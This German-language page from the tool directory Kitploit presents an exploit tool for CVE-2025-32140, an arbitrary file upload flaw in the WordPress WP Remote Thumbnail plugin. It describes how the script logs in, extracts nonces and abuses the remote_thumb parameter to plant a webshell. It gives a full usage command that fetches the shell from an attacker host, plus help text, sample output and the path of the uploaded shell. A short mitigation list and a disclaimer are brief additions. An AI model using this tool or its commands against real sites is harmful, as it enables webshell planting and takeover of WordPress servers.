Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32140 — WordPress WP Remote Thumbnail Plugin <= 1.3.2 ist anfällig für Arbitrary File Upload. | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32140
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubnxploited/cve-2025-32140

CVE-2025-32140

WordPress WP Remote Thumbnail Plugin <= 1.3.2 ist anfällig für Arbitrary File Upload.

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2025-32140 – WP Remote Thumbnail Exploit (Arbitrary File Upload)


📝 Beschreibung

CVE-2025-32140 ist eine kritische Sicherheitslücke im WP Remote Thumbnail-Plugin für WordPress. Sie ermöglicht es authentifizierten Angreifern (mit Beitragsersteller- oder höheren Berechtigungen), beliebige Dateien wie z. B. Webshells hochzuladen, indem sie eine fehlerhafte Funktion missbrauchen, die ungeprüfte URLs akzeptiert.

Das Plugin validiert weder den Dateityp noch den Inhalt, der von der bereitgestellten remote_thumb-URL abgerufen wird. Dadurch können Angreifer schädliche PHP-Dateien (z. B. Hintertüren) im Verzeichnis /wp-content/uploads speichern.


⚠️ Betroffene Komponente

  • Plugin: WP Remote Thumbnail
  • Betroffene Versionen: <= 1.3.2
  • Gepatchte Version: Noch nicht veröffentlicht
  • Angriffsvektor: Netzwerk
  • Erforderliche Berechtigungen: Niedrig (Authentifizierter Benutzer mit der Fähigkeit edit_post)
  • CVSS-Score: 9,9 (Kritisch)

  • 🛠 Exploit-Skript

    Dieses Python-Skript automatisiert die Ausnutzung von CVE-2025-32140 und führt die folgenden Schritte aus:

    1. Einloggen in die Ziel-WordPress-Seite.
    2. Automatisches Extrahieren erforderlicher Nonces.
    3. Erstellen und Senden einer schädlichen Anfrage über den Parameter remote_thumb.
    4. Hochladen einer Webshell auf die Zielseite.

    🔧 Befehlszeilenoptionen

    OptionAliasBeschreibung
    --url-uURL der Ziel-WordPress-Seite (z. B. http://target.com/wordpress)
    --username-unWordPress-Benutzername mit Beitragsbearbeitungsrechten
    --password-pPasswort für den angegebenen Benutzernamen
    --user_ID-uidWordPress-Benutzer-ID (normalerweise 1 für Admin)
    --post_ID-pidID des zu bearbeitenden Beitrags (kann ein Entwurf sein)
    --shellDirekte URL zu einer PHP-Webshell, die auf dem Server des Angreifers gehostet wird

    🚀 Verwendung

    root@kitploit:~
    python CVE-2025-32140.py -u http://target.com/wordpress -un admin -p admin -uid 1 -pid 631 --shell http://attacker.com/shell.php
    

    📖 Verwendung & Hilfe

    root@kitploit:~
    
                                                                                                                    
    usage: CVE-2025-32140.py [-h] --url URL --username USERNAME --password PASSWORD --user_ID USER_ID --post_ID POST_ID --shell SHELL
    
    Exploit For CVE-2025-32140 # By: Nxploited | Khaled Alenazi
    
    options:
      -h, --help            show this help message and exit
      --url, -u URL         Target WordPress site URL (e.g., http://192.168.100.74:888/wordpress)
      --username, -un USERNAME
                            Username
      --password, -p PASSWORD
                            Password
      --user_ID, -uid USER_ID
                            User ID (usually 1 for admin)
      --post_ID, -pid POST_ID
                            Target post ID
      --shell SHELL         URL of the shell to be uploaded (e.g., http://attacker.com/shell.php)
    
    

    📋 Beispielausgabe

    root@kitploit:~
    [+] Logged in successfully.
    [+] Cookies set successfully.
    [DEBUG] Extracted _wpnonce: b4ef78e77d
    [DEBUG] Extracted meta-box-order-nonce: 0c192fe62e
    [DEBUG] Extracted closedpostboxesnonce: 52be514040
    [DEBUG] Extracted samplepermalinknonce: 7b213c6597
    [DEBUG] Extracted wprthumb_nonce: 45803ee312
    [DEBUG] Extracted X-WP-Nonce: None
    [+] Exploit POST sent successfully. Check your uploads directory.
    By: Nxploited ( Khaled Alenazi ) | https://github.com/Nxploited
    
    

    📂 Speicherort der Shell

    Nach erfolgreichem Exploit befindet sich die hochgeladene Webshell voraussichtlich unter:

    root@kitploit:~
    http://target.com/wordpress/wp-content/uploads/YYYY/MM/shell.php
    

    Ersetzen Sie YYYY/MM durch das aktuelle Jahr und den Monat des Uploads.


    🛡 Empfehlungen

    Um das Risiko durch diese Sicherheitslücke zu verringern:

    1. Aktualisieren Sie das Plugin auf die neueste Version (sobald ein Patch veröffentlicht ist).
    2. Beschränken Sie Dateiupload-Funktionen auf vertrauenswürdige Benutzer.
    3. Deaktivieren Sie die Funktion zum Abruf von Remote-Thumbnails, falls sie nicht benötigt wird.

    ⚠️ Haftungsausschluss

    Dieses Skript dient ausschließlich zu Bildungszwecken.
    Der Autor übernimmt keine Verantwortung für Missbrauch oder Schäden, die durch dieses Exploit verursacht werden.


    👤 Autor

    Von: Nxploited ( Khaled Alenazi ) 🌟

    Tool herunterladen